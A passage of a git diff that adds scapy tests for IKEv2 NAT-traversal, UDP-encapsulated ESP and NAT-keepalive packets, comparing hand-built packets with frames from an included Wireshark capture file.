b'\x08\x07\x06\x05\x04\x03\x02\x01' + +# the IKEv1 and IKEv2 headers are compatible, so changing the version to 0x01... +pkt[IKEv2].version = 0x10 +# ...should turn the IKEv2 packet into an ISAKMP packet after building and dissecting +pkt = Ether(raw(pkt)) +pkt.show() +assert pkt[UDP].sport == 4500 +assert pkt[UDP].dport == 4500 +assert pkt[NON_ESP].non_esp == 0x00 +assert pkt[ISAKMP].version == 0x10 +assert pkt[ISAKMP].init_cookie == b'\x01\x02\x03\x04\x05\x06\x07\x08' +assert pkt[ISAKMP].resp_cookie == b'\x08\x07\x06\x05\x04\x03\x02\x01' + + += Build and dissect UDP encapsulated ESP packets + +pkt = Ether() / IP() / UDP() / ESP(spi = 0x01020304) +pkt.show() +assert pkt[UDP].sport == 4500 +assert pkt[UDP].dport == 4500 +assert pkt[ESP].spi == 0x01020304 + +pkt = Ether(raw(pkt)) +pkt.show() +assert pkt[UDP].sport == 4500 +assert pkt[UDP].dport == 4500 +assert pkt[ESP].spi == 0x01020304 + += Build and dissect UDP encapsulated NAT-keepalive packets + +pkt = Ether() / IP() / UDP() / NAT_KEEPALIVE() +pkt.show() +assert pkt[UDP].sport == 4500 +assert pkt[UDP].dport == 4500 +assert pkt[NAT_KEEPALIVE].nat_keepalive == 0xFF + +pkt = Ether(b'DNm\xa4\xf6G`W\x18\x93\x9c\x7f\x08\x00E\x00\x00\x1d\xfb.\x00\x00\x80\x11\x9a\x16\xc0\xa8\x01\x1c>\x99\xa5-*\xca\x11\x94\x00\t\x1e\xf2\xff') +pkt.show() +assert pkt[UDP].dport == 4500 +assert pkt[NAT_KEEPALIVE].nat_keepalive == 0xFF + + ++ Wireshark Captures + += IKEv2 key exchange with NAT-traversal + +* Loads and dissects the four frames of the key exchange from a Wireshark +* capture and compares them with manually built scapy packets. + +pcap = rdpcap(scapy_path("/test/pcaps/ikev2_nat_t.pcapng"), count=4) + +ike_auth_request_encrypted_payload = binascii.unhexlify(''.join(""" + be11 14ab1abe02954640 ce512b03d6527a50 +dd17707ff420b9b5 b02d2874c57afdd3 fa95b15693017a12 8333c8d694f2cd61 +e98b0717f65e1860 430f0699a4174af6 a6c929ff4114b686 f201f471ff9b191e +4d4cbd43dd994ef6 d5179b6845843d2d 1502f16d4356dc3b ad819c1b0549296b +dbe479878dbc8a8b e71f9017946bc198 ef010f83a69a5d81 a312be0df9afa949 +e3f0807bd2785498 c0c492f0bcde5085 b2df1187657cbf23 e11c25558af278d0 +1bceadf5548a8990 a6adea270410cb16 1786e0798ed8f047 3442b43399e42122 +6f2ee1e2b0787dfc f56b7b32f3d0b02d 038764ce8ffee757 b94896763c68c2bb +2a94dec851dcf7e4 489ba8e431d1c63c f5d19a097674b513 58e6b5052a87dd48 +bb3be834b06ab704 579fcac6f6bf647c 87b4c5c0b7353df6 0b55e32a75ac4ced +3c1724d32a068207 226769352b08eefb 195da55e29c3eea1 05f0fd024029e0d7 +8b83757bd1b6052a 64febad6779cfca3 5b9a2529dc15d2a5 ee8825a2ab3e72ed +e84aaeb86e8debd6 2a9b3d6503dd6c1a 7e03b87b81578dc0 fb087a5ad2d6bf6b +d149d108defcabb5 721f8b4ebf1b9b78 80bdd2fc93856afe 4f54a32125964bbc +fd917239f5af1db9 cd3d188ab7165826 7a445c13d2147169 5da3f3a674c2baaf +5fd7636cc8ca4b43 142fd2588bb31fdd d6a42b20ebc03b01 04e8beb1356fc863 +0bd95de8574e16fe 14cfa9a6455e20e9 eb08bf632cea53e7 c614277e32fa81d9 +cb2efed29b04377a 748bfab753058349 f21a03fa5c5f478b c0bd993ca3e982b9 +d19fa8d24306e46a b41d9bbfd1d2e2da 112b6c840cc7b86b 8e005aa71b5339d1 +ff2eabb0124df2bf 910173c17380a7e3 85d22f94fa6e3f78 bce897a9a37e08c1 +1124661701dfd643 bba0c4ab4d8e19bb 95478e272d61c1a1 6d4e562f25c3c0a1 +69d39a84045183e2 684ac80ab6e18f20 dc4cc8d5b1d83293 07766d58695eff56 +14c207e045152933 07f9dbeb621e1c25 665f75f55e1ae90c aa43a500fa1ecf18 +3d7e7d46db8eae03 e1bc7a3aefab0c00 9884ca11e7889841 8459936a02699e5f +7f798d3c81de4933 a7f14f62aa5c31ae 2693089ca1df68a5 2cd338d5d2539053 +5099dd4f0646318f 079822b43f5a47b7 db9eba75ef843a42 98fb9e695a349824 +bef5ee441997f7c5 303c4f8288bb8be1 6cc72fc348c777ec 7ce8b0f032633890 +f01fbeef028f3bb5 ffd1ec663e9304cf 745d4659fc67f32d cffffa9deae65066 +5a2779b742057d71 86bd2603ce0946c4 1589d63fae9c404d 6c7f793a436c775a +d7d34f2dd609a272 4ac70b514a76d248 8eefb6fc2f3bd196 4dfc1a0d652e89a9 +e0b3278bc2c4c961 19df82bdc3b1f99d 399b0dbf62d23ea3 a7e940177525130b +df5960b33b3d2d73 28d98a5fd9bbec2e 71404b77facc8053 a14feafd49bf150f +450384b99d392549 31f06ac18d225368 5c52b4ee6ad50337 dbce7f72bf56e4bf +55fdf3fd42c39c7d 65a48987ad84d1e0 c4e4543463c95a8e 646744240fdc00b6 +0c009f4afd15b800 182a5004e4062557 e7b20115e01d1cc3 5eb8d01e22f0bf2d +bb2db84a970934d0 5f9b0d5e5350a45f 733a747e229eca56 087886a5c09efac8 +0c9545e6d849189b 40d7e7b9da4a9f04 9fb0273c3a2ad370 a84d5e7db14c362c +c84483bbe70f2573 8116b11b877a7939 628a2dec6a590056 fdc7ce849770f12d +0f63a701e672cf93 75c68c4325e60e3e ae46c7dd014df09d 4594339fa5e82ab3 +9de316df933694da e20120886403 +""".split())) + + +ike_auth_response_encrypted_payload = binascii.unhexlify(''.join(""" + 0fb3 4e8905b03a3d9b97 70f3e63428ab00be +1bc29397bec721ef 9bd02e6cc64a309b 0c0dd67e4442f235 c201ccb5f6b8c8b0 +26baaaf0dce597c0 dd610ebbc4aa2d07 8cbd6fdc2dd879a9 f3216edaabd965d8 +5fe04a202615c5c6 08b0caf7db24dc08 4d0d86e560ccb75e 209941a2945bab45 +0795b96cc4f03752 163825f1be62d009 038f29f25956f3e9 3648ea647af4fbea +52a19bbf16074ed3 9161cfd1a1695176 059cbfc48c57755f b1b1b397155171a0 +b11e10d3f476512b 73687912265ccb6f 1fef5aa5dee1ffc3 a5ecc574a76d529b +884f819f859c015a a3977230a69657d7 1d54b5cfebcc135a 4010294fdc98db45 +e933cfeca0d638b1 f3f42c863be5501c 105ebc0efc4a8dd2 e48fdc4f35a59068 +5b1c073f6dd368fa 4ac1af60469f5ac0 d209445259a5ec1c e1ce59fad2dd60bb +11eae2a678095d99 7b69733553933371 b083e1f94d5bd71d b9fc9167068f4565 +1f9de7b7cfa30e6f 54f65e2c9f1a6d88 ff7beff94532af43 ce9067db85fd3679 +5a8ad841889285f4 f27d740d8da1429b 0764f789f314e20f 5a08258b4bdfd75d +7b7b9cb4b0bb7c2b a469ac24545f2fbe 0621bdaa76898cb6 cb3bbd334c6b6394 +ef7e1cf31df2dd0b 86089a654b942f6e fb7ee5ba401200e0 d727791fc3f978dc +f446067cd054e664 69ea05784e61ce67 a1fe98a73d22962d 703ad51ff1091920 +f111c2f1535197f8 72471fc2b482b55b 15bfb7525c4c1b4d 8b9a1b98534dcea5 +8343e35e0ecb0164 953604b8687315b8 86509cc26b8730be f8ef669e77466628 +2da94192b67f0c4a 56ff1f7b3a080e4f 0e9ed767d497e8d3 1807169a7c62b80c +c27c8e4907d59b02 a9d5fd0b9aa8ed96 7bd26a1ad6bce39b 562382ccfc6102d3 +5d4cefd222eadfc4 cffff96f16e69c4a 7b7367dbf48a13c2 1c95ef3b3bf7e1fb +b240854e6c40b8a8 a8e957919e088d36 4e1da0c0130ae87b 83e980f6f14a9cfa +fe8e956d489a03aa c365767ec06cee58 04ed81cfe559a8a5 ed00e0ae964e2705 +d2c9011390ba6afd 262b4527144ce8b6 4d438ebddd94eb2c e39c6c254547f0d4 +27b4abf5217c9588 f96dc393517bfab2 50153321ddced8e2 dbb52454e342a483 +1af575c5420b5d37 42aa9ae79e3e7187 3117fd36c856e1c0 317b4ad2d1d3fe38 +b528eb3438210e14 d10e5d2d9feff9d8 1f6fdefde57da710 db7f72e03d154aba +61bacccd26c0a80f e710f55eb5bb59db 2c0aec7f1003fb4f 1ffd219932bc8e7f +4f7ced086f6c3067 7610e78a6e8e04dc 330cd2da1ffb181a e09b5b52b9ea366b +ea88329e2c2d6f51 68b1b2b7ac118861 a56cdc43402d89d6 26344a127a7cb39a +3f2e1a8ae35b72fa c0b8eb83622cd944 fe86bc8f340ea1a0 81fb980c9e6baa8e +f9c1b37d11b13d51 e0cf72aac6dbfab9 49f8443d4f3098f9 b022ea0fa25dd418 +f9cc26d0b8358ddd 778204fd9da6374a 46c4cc1777485acc b9c3975a1c12d9f3 +ac326a8e37ca3c17 31a0b6f163a4335c 1c589d52d8b82699 c0c1b31b6b58a7d6 +76d3eeca77a0b4ee 289b11494a217031 d464e32c28e7c109 5afdad0297c5dd65 +1ad1a856f330647a 4ba7be0eee67eace e4a8137709b1234e 07909fb464b5b4fe +f63e8829a9f066dc ecb8c12cf91836cd 7b7300b86ecea0f7 467b2991832c8380 +3e5f02e1b663e064 e4bd991caa1bcadb 38d984595233f6aa 5c7079217ea5405e +72a515e9f787d3d9 0a48cb098216f8ff a94ddd0bd8634d48 2f4ffcb96dd81e66 +0a4324eb34f6 +""".split())) + + +frames = [ + # IKE_SA_INIT request + ( + # i: frame number + 0, + # data: raw frame data + binascii.unhexlify(''.join(""" + 005056eddb32000c 2930109e08004500 014cedc240004011 da45c0a8f583ac10 + 0f5c2aca11940138 97c9000000008992 2c915f35570e0000 0000000000002120 + 2208000000000000 012c220000280000 0024010100030300 000c01000014800e + 0100030000080200 0005000000080400 0013280000480013 0000db253178440c + e776a794133cb8b6 9e5eb07473353657 0c64d7b630549c89 9c0712d828b37168 + 500885e051024578 afc75c101f73b894 3cad62d74a30f2be 1fca2b00002c09cb + 538b2c3dbd4d0bb0 eec8d318cb801a9b 4715b207828d9b5f f1f4ec64ed588637 + 07bcf14ccf052b00 0014eb4c1b788afd 4a9cb7730a68d56c 53212b000014c61b + aca1f1a60cc10800 0000000000002b00 00184048b7d56ebc e88525e7de7f00d6 + c2d3c00000002900 00144048b7d56ebc e88525e7de7f00d6 c2d3290000080000 + 402e290000080000 4016000000100000 402f000100020003 0004 + """.split())), + # packet: Ether / IP / UDP / NON_ESP / IKEv2 / ... + Ether(dst='00:50:56:ed:db:32', src='00:0c:29:30:10:9e', type='IPv4') / + IP(version=4, ihl=5, tos=0x0, len=332, id=60866, flags='DF', frag=0, ttl=64, proto='udp', chksum=0xda45, src='192.168.245.131', dst='172.16.15.92') / + UDP(sport=10954, dport=4500, len=312, chksum=0x97c9) / + NON_ESP() / + IKEv2( + init_SPI=b'\x89\x92\x2c\x91\x5f\x35\x57\x0e', + resp_SPI=b'\x00\x00\x00\x00\x00\x00\x00\x00', + next_payload='SA', + version=0x20, + exch_type='IKE_SA_INIT', + flags='Initiator', + id=0, + length=300 + ) / + IKEv2_payload_SA( + next_payload='KE', + res=0, + length=40, + prop=IKEv2_payload_Proposal( + next_payload='last', + res=0, + length=36, + proposal=1, + proto='IKEv2', + SPIsize=0, + trans_nb=3, + SPI='', + trans=( + IKEv2_payload_Transform( + next_payload='Transform', + res=0, + length=12, + transform_type='Encryption', + res2=0, + transform_id='AES-GCM-16ICV', + key_length=256 + ) / + IKEv2_payload_Transform( + next_payload='Transform', + res=0, + length=8, + transform_type='PRF', + res2=0, + transform_id='PRF_HMAC_SHA2_256' + ) / + IKEv2_payload_Transform( + next_payload='last', + res=0, + length=8, + transform_type='GroupDesc', + res2=0, + transform_id='256randECPgr' + ) + ) + ) + ) / + IKEv2_payload_KE( + next_payload='Nonce', + res=0, + length=72, + group='256randECPgr', + res2=0, + load=b'\xdb%1xD\x0c\xe7v\xa7\x94\x13<\xb8\xb6\x9e^\xb0ts56W\x0cd\xd7\xb60T\x9c\x89\x9c\x07\x12\xd8(\xb3qhP\x08\x85\xe0Q\x02Ex\xaf\xc7\\\x10\x1fs\xb8\x94<\xadb\xd7J0\xf2\xbe\x1f\xca' + ) / + IKEv2_payload_Nonce( + next_payload='VendorID', + res=0, + length=44, + load=b'\t\xcbS\x8b,=\xbdM\x0b\xb0\xee\xc8\xd3\x18\xcb\x80\x1a\x9bG\x15\xb2\x07\x82\x8d\x9b_\xf1\xf4\xecd\xedX\x867\x07\xbc\xf1L\xcf\x05' + ) / + IKEv2_payload_VendorID( + next_payload='VendorID', + res=0, + length=20, + vendorID=b'\xebL\x1bx\x8a\xfdJ\x9c\xb7s\nh\xd5lS!' + ) / + IKEv2_payload_VendorID( + next_payload='VendorID', + res=0, + length=20, + vendorID=b'\xc6\x1b\xac\xa1\xf1\xa6\x0c\xc1\x08\x00\x00\x00\x00\x00\x00\x00' + ) / + IKEv2_payload_VendorID( + next_payload='VendorID', + res=0, + length=24, + vendorID=b'@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\xc0\x00\x00\x00' + ) / + IKEv2_payload_VendorID( + next_payload='Notify', + res=0, + length=20, + vendorID=b'@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3' + ) / + IKEv2_payload_Notify( + next_payload='Notify', + res=0, + length=8, + proto='Reserved', + SPIsize=0, + type='IKEV2_FRAGMENTATION_SUPPORTED', + SPI=b'', + load=b'' + ) / + IKEv2_payload_Notify( + next_payload='Notify', + res=0, + length=8, + proto='Reserved', + SPIsize=0, + type='REDIRECT_SUPPORTED', + SPI=b'', + load=b'' + ) / + IKEv2_payload_Notify( + next_payload='None', + res=0, + length=16, + proto='Reserved', + SPIsize=0, + type='SIGNATURE_HASH_ALGORITHMS', + SPI='', + load=b'\x00\x01\x00\x02\x00\x03\x00\x04' + ) + ), + # IKE_SA_INIT response + ( + # i: frame number + 1, + # data: raw frame data + binascii.unhexlify(''.join(""" + 000c2930109e0050 56eddb3208004500 0151a5dc00008011 2227ac100f5cc0a8 + f58311942aca013d af99000000008992 2c915f35570e98d5 6d32e2a047422120 + 2220000000000000 0131220000280000 0024010100030300 000c01000014800e + 0100030000080200 0005000000080400 0013280000480013 00001d9cd5974c95 + 0c95e0544483fb1f 7a9132f5fe8959c0 9ab3a54c779ff2bc f4522a030dc33b9d + 5ddfeb99e028c0e8 ba7d80dfdcf12b15 16dbe180e6aec664 428b2600002c1d10 + 7dc5a7463da7d761 014139fb381af9cd 3b8c0181e6cd36a8 ae105e55aa7fe71f + 5db1d36c29152b00 0005042b00001840 48b7d56ebce88525 e7de7f00d6c2d3c0 + 0000002b00001440 48b7d56ebce88525 e7de7f00d6c2d32b 000014c6f57ac398 + f493208145b7581e 8789832900001485 817703c6e320d2ae 5a4dd02056c6d729 + 0000080000402e29 0000100000402f00 0100020003000400 00000800004014 + """.split())), + # packet: Ether / IP / UDP / NON_ESP / IKEv2 / ... + Ether(dst='00:0c:29:30:10:9e', src='00:50:56:ed:db:32', type='IPv4') / + IP(version=4, ihl=5, tos=0x0, len=337, id=42460, flags='', frag=0, ttl=128, + proto='udp', chksum=0x2227, src='172.16.15.92', dst='192.168.245.131') / + UDP(sport=4500, dport=10954, len=317, chksum=0xaf99) / + NON_ESP() / + IKEv2( + init_SPI=b'\x89\x92\x2c\x91\x5f\x35\x57\x0e', + resp_SPI=b'\x98\xd5\x6d\x32\xe2\xa0\x47\x42', + next_payload='SA', + version=0x20, + exch_type='IKE_SA_INIT', + flags='Response', + id=0, + length=305 + ) / + IKEv2_payload_SA( + next_payload='KE', + res=0, + length=40, + prop=IKEv2_payload_Proposal( + next_payload='last', + res=0, + length=36, + proposal=1, + proto='IKEv2', + SPIsize=0, + trans_nb=3, + SPI='', + trans=( + IKEv2_payload_Transform( + next_payload='Transform', + res=0, + length=12, + transform_type='Encryption', + res2=0, + transform_id='AES-GCM-16ICV', + key_length=256 + ) / + IKEv2_payload_Transform( + next_payload='Transform', + res=0, + length=8, + transform_type='PRF', + res2=0, + transform_id='PRF_HMAC_SHA2_256' + ) / + IKEv2_payload_Transform( + next_payload='last', + res=0, + length=8, + transform_type='GroupDesc', + res2=0, + transform_id='256randECPgr' + ) + ) + ) + ) / + IKEv2_payload_KE( + next_payload='Nonce', + res=0, + length=72, + group='256randECPgr', + res2=0, + load=b'\x1d\x9c\xd5\x97L\x95\x0c\x95\xe0TD\x83\xfb\x1fz\x912\xf5\xfe\x89Y\xc0\x9a\xb3\xa5Lw\x9f\xf2\xbc\xf4R*\x03\r\xc3;\x9d]\xdf\xeb\x99\xe0(\xc0\xe8\xba}\x80\xdf\xdc\xf1+\x15\x16\xdb\xe1\x80\xe6\xae\xc6dB\x8b' + ) / + IKEv2_payload_Nonce( + next_payload='CERTREQ', + res=0, + length=44, + load=b'\x1d\x10}\xc5\xa7F=\xa7\xd7a\x01A9\xfb8\x1a\xf9\xcd;\x8c\x01\x81\xe6\xcd6\xa8\xae\x10^U\xaa\x7f\xe7\x1f]\xb1\xd3l)\x15' + ) / + IKEv2_payload_CERTREQ( + next_payload='VendorID', + res=0, + length=5, + cert_type='X.509 Certificate - Signature', + cert_data=b'' + ) / + IKEv2_payload_VendorID( + next_payload='VendorID', + res=0, + length=24, + vendorID=b'@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3\xc0\x00\x00\x00' + ) / + IKEv2_payload_VendorID( + next_payload='VendorID', + res=0, + length=20, + vendorID=b'@H\xb7\xd5n\xbc\xe8\x85%\xe7\xde\x7f\x00\xd6\xc2\xd3' + ) / + IKEv2_payload_VendorID( + next_payload='VendorID', + res=0, + length=20, + vendorID=b'\xc6\xf5z\xc3\x98\xf4\x93 \x81E\xb7X\x1e\x87\x89\x83' + ) / + IKEv2_payload_VendorID( + next_payload='Notify', + res=0, + length=20, + vendorID=b'\x85\x81w\x03\xc6\xe3 \xd2\xaeZM\xd0 V\xc6\xd7' + ) / + IKEv2_payload_Notify( + next_payload='Notify', + res=0, + length=8, + proto='Reserved', + SPIsize=0, + type='IKEV2_FRAGMENTATION_SUPPORTED', + SPI=b'', + load=b'' + ) / + IKEv2_payload_Notify( + next_payload='Notify', + res=0, + length=16, + proto='Reserved', + SPIsize=0, + type='SIGNATURE_HASH_ALGORITHMS', + SPI=b'', + load=b'\x00\x01\x00\x02\x00\x03\x00\x04' + ) / + IKEv2_payload_Notify( + next_payload='None', + res=0, + length=8, + proto='Reserved', + SPIsize=0, + type='MULTIPLE_AUTH_SUPPORTED' + ) + ), + # IKE_AUTH request + ( + # i: frame number + 2, + # data: raw frame data + binascii.unhexlify(''.join(""" + 005056eddb32000c 2930109e08004500 0520edc640004011 d66dc0a8f583ac10 + 0f5c2aca1194050c 8eb0000000008992 2c915f35570e98d5 6d32e2a047422e20 + 2308000000010000 0500230004e4 + """.split())) + ike_auth_request_encrypted_payload, + # packet: Ether / IP / UDP / NON_ESP / IKEv2 / ... + Ether(dst='00:50:56:ed:db:32', src='00:0c:29:30:10:9e', type='IPv4') / + IP(version=4, ihl=5, tos=0x0, len=1312, id=60870, flags='DF', frag=0, ttl=64, + proto='udp', chksum=0xd66d, src='192.168.245.131', dst='172.16.15.92') / + UDP(sport=10954, dport=4500, len=1292, chksum=0x8eb0) / + NON_ESP() / + IKEv2( + init_SPI=b'\x89\x92\x2c\x91\x5f\x35\x57\x0e', + resp_SPI=b'\x98\xd5\x6d\x32\xe2\xa0\x47\x42', + next_payload='Encrypted', + version=0x20, + exch_type='IKE_AUTH', + flags='Initiator', + id=1, + length=1280 + ) / + IKEv2_payload_Encrypted( + next_payload='IDi', + res=0, + length=1252, + load = ike_auth_request_encrypted_payload + ) + ), + # IKE_AUTH response + ( + # i: frame number + 3, + # data: raw frame data + binascii.unhexlify(''.join(""" + 000c2930109e0050 56eddb3208004500 0518a5dd00008011 1e5fac100f5cc0a8 + f58311942aca0504 886e000000008992 2c915f35570e98d5 6d32e2a047422e20 + 2320000000010000 04f8240004dc + """.split())) + ike_auth_response_encrypted_payload, + # packet: Ether / IP / UDP / NON_ESP / IKEv2 / ... + Ether(dst='00:0c:29:30:10:9e', src='00:50:56:ed:db:32', type='IPv4') / + IP(version=4, ihl=5, tos=0x0, len=1304, id=42461, flags='', frag=0, ttl=128, + proto='udp', chksum=0x1e5f, src='172.16.15.92', dst='192.168.245.131') / + UDP(sport=4500, dport=10954, len=1284, chksum=0x886e) / + NON_ESP() / + IKEv2( + init_SPI=b'\x89\x92\x2c\x91\x5f\x35\x57\x0e', + resp_SPI=b'\x98\xd5\x6d\x32\xe2\xa0\x47\x42', + next_payload='Encrypted', + version=0x20, + exch_type='IKE_AUTH', + flags='Response', + id=1, + length=1272 + ) / + IKEv2_payload_Encrypted( + next_payload='IDr', + res=0, + length=1244, + load=ike_auth_response_encrypted_payload + ) + ), +] + + +for i, data, packet in frames: + # the raw frame data coincides with the frame from the packet capture + assert data == raw(pcap[i]) + # the scapy packet correctly describes the frame + assert raw(packet) == data + # reassembling the dissected frame yields the original frame + assert raw(Ether(data)) == data diff --git a/test/pcaps/ikev2_nat_t.pcapng b/test/pcaps/ikev2_nat_t.pcapng new file mode 100644 index 0000000000000000000000000000000000000000..8492f15196b67fa3800831961d135bb83493e571 GIT binary patch literal 18476 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 